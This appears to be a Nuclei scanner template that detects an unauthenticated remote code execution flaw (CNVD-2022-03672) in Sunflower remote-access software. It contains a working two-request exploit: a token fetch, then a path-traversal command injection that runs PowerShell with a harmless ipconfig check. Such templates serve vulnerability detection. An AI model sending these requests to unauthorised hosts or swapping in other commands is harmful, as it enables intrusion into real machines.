id: CNVD-2022-03672 info: name: Sunflower Simple and Personal - Remote Code Execution author: daffainfo severity: critical description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 2 tags: cnvd,cnvd2022,sunflower,rce http: - raw: - | POST /cgi-bin/rpc HTTP/1.1 Host: {{Hostname}} action=verify-haras - | GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 Host: {{Hostname}} Cookie: CID={{cid}} extractors: - type: regex name: cid internal: true group: 1 regex: - '"verify_string":"(.*?)"' matchers: - type: dsl dsl: - "status_code_1==200" - "status_code_2==200" - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and # digest: 4a0a004730450220390bd0f291ed6719ac99f1b99704321d1d494d765e27a461bfa4e40e2c5b1de3022100e455e5442cc085d18b9510c673ce41df4cfabc49acf8e45f5bb687cca53a4f9e:922c64590222798bb761d5b6d8e72950